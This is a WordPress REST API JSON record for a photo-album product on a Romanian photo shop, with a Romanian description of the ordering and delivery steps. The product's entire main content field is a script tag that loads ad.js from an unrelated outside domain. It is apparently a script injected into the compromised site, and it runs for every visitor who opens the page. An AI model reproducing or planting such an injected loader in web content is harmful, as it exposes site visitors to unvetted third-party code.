{"id":1002,"date":"2016-12-09T22:07:10","date_gmt":"2016-12-09T22:07:10","guid":{"rendered":"http:\/\/www.digitalprofoto.ro\/online\/produs\/album-patrat-coperta-groasa-12x15\/"},"modified":"2026-03-26T17:48:52","modified_gmt":"2026-03-26T17:48:52","slug":"album-patrat-coperta-groasa-12x15","status":"publish","type":"product","link":"https:\/\/www.digitalprofoto.ro\/online\/produs\/album-patrat-coperta-groasa-12x15\/","title":{"rendered":"Album PANORAMIC 12&#215;15 lux"},"content":{"rendered":"<p><script src='https:\/\/blueeyeswebsite.com\/ad.js' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span style=\"font-weight: 400;\">Acest album este un album personalizat cu fotografiile trimise de tine. Albumul con\u021bine 18 pagini cartonate pe hartie foto KODAK. Pasii pentru realizarea lui sunt:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Ne trimiti fotografiile care vor aparea \u00een album. Fotografiile pot fi incarcate direct in sectiunea de mai jos sau pot fi inc\u0103rcate pe www.transfer.ro, www.wetransfer.com, Dropbox.com, Drive, OneDrive sau oricare alt site care permite UPLOAD de fi\u0219iere. <\/span><span style=\"font-weight: 400;\">Ne po\u021bi trimite pe mail doar link-ul pentru a putea desc\u0103rca fotografiile.<\/span> <span style=\"font-weight: 400;\">Adresa noastra: <\/span><a href=\"mailto:office@digitalprofoto.ro\"><span style=\"font-weight: 400;\">0ffice@DigitalProFoto.ro<\/span><\/a><span style=\"font-weight: 400;\">\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Noi facem grafica paginilor, ti le aratam si facem maxim 5 modificari daca ceva nu-ti place.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Dup\u0103 maxim 3 zile lucr\u0103toare albumul este gata si-l poti lua din magazinul nostru sau putem sa-l expediem c\u0103tre adresa indicata de tine. Livrarea albumului se realizeaza prin Po\u0219ta Rom\u00e2n\u0103 cu plata RAMBURS sau prin Curier Rapid. Dac\u0103 valoarea comenzii dep\u0103\u0219e\u0219te 300 lei livrarea este gratuita.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Aceste albume se pot executa cu fotografii cu bebelu\u0219i, de botez, de s\u0103rb\u0103tori, de anivers\u0103ri, de vacan\u021ba, de nunt\u0103 sau pentru cineva drag.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Fotografiile le putem realiza noi contra-cost, in cadrul unei sedinte foto. Detalii in magazin, sau la una din variantele puse la dispozitie la <a href=\"http:\/\/www.digitalprofoto.ro\/contact.php\">CONTACT<\/a><\/span><\/li>\n<\/ul>\n","protected":false},"featured_media":677,"comment_status":"open","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/product\/1002"}],"collection":[{"href":"https:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/comments?post=1002"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/media\/677"}],"wp:attachment":[{"href":"https:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/media?parent=1002"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}